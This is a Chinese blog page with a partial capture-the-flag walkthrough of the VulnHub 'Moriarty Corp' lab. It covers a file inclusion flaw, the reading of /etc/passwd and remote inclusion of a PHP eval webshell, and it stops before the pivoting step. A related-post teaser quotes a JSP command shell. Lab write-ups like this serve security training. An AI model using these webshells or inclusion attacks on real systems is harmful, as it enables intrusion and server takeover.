vulnhub_内网渗透测试的记录——网络安全

vulhub】Tomcat任意文件上传漏洞(CVE-2017-12615)复现 漏洞介绍 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求 阅读详情

在这里插入图片描述

主要考察知识点

     文件包含
    内网穿透
    命令上传
    弱口令
    更改权限
    HTTP协议Header
    ElasticSearch-CVE
    暴力破解

网络拓扑

写完之后把靶机的网络拓扑也做了一下

在这里插入图片描述

写在之前

这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整

在这里插入图片描述
网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。

靶机下载地址:

BoredHackerBlog: Moriarty Corp

渗透过程

IP发现
这里使用的windows的环境进行渗透测试,使用Advanced_IP_Scanner进行内网IP扫描
在这里插入图片描述
根据MAC地址发现IP,对获取到的IP进行端口扫描

端口扫描

这里使用的是御剑端口扫描器进行发现
在这里插入图片描述
发现存在8000端口和9000端口可疑端口,尝试进行WEB访问

WEB渗透

访问8000端口
在这里插入图片描述
是一个提交flag的页面,同时显示了我们的任务进度,首先根据提示提交第一个flag

再次显示新的提示
在这里插入图片描述
结合强大的百度翻译和谷歌翻译,大概明白了让我们从80端口开始渗透,然后在此提交flag,这个时候再次访问80端口

在这里插入图片描述
已经可以成功访问了,正式开始我们的渗透过程

在这里插入图片描述
据url发现疑似存在文件包含漏洞,尝试读取一下敏感数据
在这里插入图片描述
成功读取/etc/passwd文件,我们构造一下查看能否远程包含webshell

首先在本地服务器构造webshell

 <?php
eval($_REQUEST['pdsdt']);
echo 'Welcome Hacker';
phpinfo();
?>

尝试远程文件包含
在这里插入图片描述
成功包含远程文件,使用蚁剑链接webshell
在这里插入图片描述
找寻flag和下一步的信息

在根目录下发现flag文件
在这里插入图片描述
在8000页面进行提交,提交完毕之后再次给了我们提示

在这里插入图片描述

大概意思就是告诉我们网站的web服务已经没有什么有价值的信息了,下一步需要内网渗透,同时给了我们内网的网段,下一步就是转发流量进行内网渗透了

内网渗透-设置代理

设置内网代理,这里设置内网代

通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本) 阅读详情

相关推荐

Vulhub靶场ActiveMQ任意文件上传漏洞复现

Vulhub靶场ActiveMQ任意文件上传漏洞复现

X_python321的博客 731

vulhub漏洞复现】CVE-2018-2894 Weblogic任意文件上传漏洞

一、漏洞详情WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic的某个上传点存在文件上传漏洞,导致可以上传任意jsp文件从而获取服务器权限。二、复现过程搭建docker环境。

RexHa的博客 2490

10分钟上手YOLOv11:最强姿态估计模型来了,代码开源,效果炸裂!

【10分钟玩转YOLOv11实时姿态估计】🚀 YOLOv11作为YOLO家族最新成员,在速度、精度和易用性上全面升级,尤其适用于姿态估计等复杂视觉任务。本文带您快速掌握: 1️⃣ 核心概念:姿态估计即识别人体17个关键点(如关节部位)并连接成数字骨架,是智能健身、体感游戏等应用的基础。 2️⃣ 技术优势: 超轻量级(最小仅2.9M参数) 极速推理(GPU仅1.7ms) 高精度(COCO mAP@50-95达50%) 3️⃣ 三步实操: ① 安装:pip install ultralytics ② 准备人物

weixin_41246802的博客 1733

【甄选靶场】Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)

Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全网络安全渗透测试

人间体佐菲的博客 1033

vulhub漏洞复现:Weblogic 任意文件上传漏洞(CVE-2018-2894)、Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

1.1 Weblogic 任意文件上传漏洞(CVE-2018-2894) (1)cd CVE-2020-14882 切换目录。 (2)docker-compose up -d 启动。 (3) 访问http://192.168.85.128:7001/console (4)查看密码和用户名:docker-compose logs | grep password docker-compose logs | grep username (5)登录。 (6)点击部署,点击安装。

weixin_48739941的博客 1540

【甄选靶场】Vulnhub百个项目渗透——项目十:stapler-1(文件上传,多方式提权)

网络安全渗透测试,网络空间安全

人间体佐菲的博客 1169

vulhub Weblogic 任意文件上传漏洞

这个是别人发出出来的思路,如果我们按照我们常规的测试方法是不可能发现的,所以需要分类后,去网上找别人分享都一步一步去,他太复杂了。并且获取到账户和密码,然后根据页面的提示设置好相对应的东西,再根据网页的提示打开到最后到有漏洞的网站,这里已经成功了,只是我上传的文件没有写jsp的脚本代码。这个演示是上传一个jsp的后门,不是php的,我们打开测试靶场,根据提示搭建好靶场。CVE-2018-2894演。

san3144393495的博客 343

vulhub】Weblogic任意文件上传漏洞(CVE-2018-2894)

前言 Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 受影响的版本 weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。 利用条件: 1、需要知道部署应用的web目录 2、ws_utc/config.do在开发模式下无需认证,在生产模式下需要认证。 一、启动靶机 docker-com

weixin_42884199的博客 2498

【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)

【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)

人间体佐菲的博客 1652

一句话收录

JSP马 带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<p

baidu_38844729的博客 641

Vulhub Apache Flink 文件上传漏洞复现

关于Vulhub Apache Flink 文件上传漏洞复现

weixin_53696027的博客 497

文件上传漏洞--VulHub靶场

Vulhub 是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

专注网络安全技术分享,从漏洞分析到防御策略,记录我的学习与实践。 103

今年的hsctf里遇到了一个比较少见的nds逆向题目,侥幸拿下一血

NDS:任天堂DS,是电玩游戏生产商任天堂公司2004年发售的第三代便携式游戏机。主要的特征包括了双屏幕显示,其中下方的屏幕为触摸屏;并配置有麦克风声音输入装置和 Wi-Fi 无线网络功能。这里题目提供了一个chall.nds的文件,一个nds的ROM文件,可以在pc上使用模拟器来加载运行,在这里我使用的是DeSmuME模拟器。

ZL_1618的博客 1263

BootStrap入门

Bootstrap,来自 Twitter,是一款受欢迎的前端框架。Bootstrap 是基于 HTML、CSS、JAVASCRIPT 的,它简洁灵活,使得 Web 开发更加快捷。

m0_74637610的博客 306

文件上传漏洞

本文章供交流学习,另外错误部分还请帮忙评论告知便于更改

weixin_52657559的博客 2457

AS5600磁编码器选型与安装避坑指南:磁铁形状、间隙距离到底怎么选?(附实测数据)

本文详细解析了AS5600磁编码器的选型与安装要点,包括磁铁形状、间隙距离等关键参数的选择,并附有实测数据支持。特别针对Arduino和I2C接口的应用场景,提供了硬件选型和机械安装的实用指南,帮助开发者避免常见陷阱,提升系统精度和稳定性。

weixin_27038245的博客 248

华为ENSP全系实验.zip

目录小型企业网组网实训企业组网实训静态 vxlan 同网段不同网段实验WLAN配置拓扑MX7 AR2220中小型园区分支综合配置示例园区网络项目实战以太网链路聚合实验虚拟防火墙基础实验小型组网:NAT的典型应用小型企业组网:网络地址转换、NAT server小型企业组网小型企业网组网实训详解组播Multicast:PIM-SM详解组播Multicast:PIM DM详解小型企业组网实验1详解无状态自动配置IPv6地址详解三层交换机与防火墙对接上网配置示例详解配置路由重发布(OSPF 与 RIP)详解配置交换机多生成树MSTP+VRRP 的典型组网详解路由器上的虚拟路由冗余协议 VRRP详解路由器上的 VRRP Track详解路由器的DHCP Snooping 的配置详解路由策略和通过抓取IP前缀ip-prefix引入路由详解路由策略详解交换路由VRRP+MSTP+路由策略综合配置详解防火墙双机组网环境中的详解防火墙的GRE、NAT配置详解防火墙VRRP、双机热备、OSPF、链路聚合、MSTP综合配置详解防火墙........

上一篇: 还在为不知道怎么学习网络安全而烦恼吗?这篇文带你从入门级开始学习网络安全—认识网络安全
下一篇: 管理员请注意 一条后门病毒攻击链正在针对服务器发起入侵
IT老涵
博客等级 码龄5年 4555粉丝 414原创
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值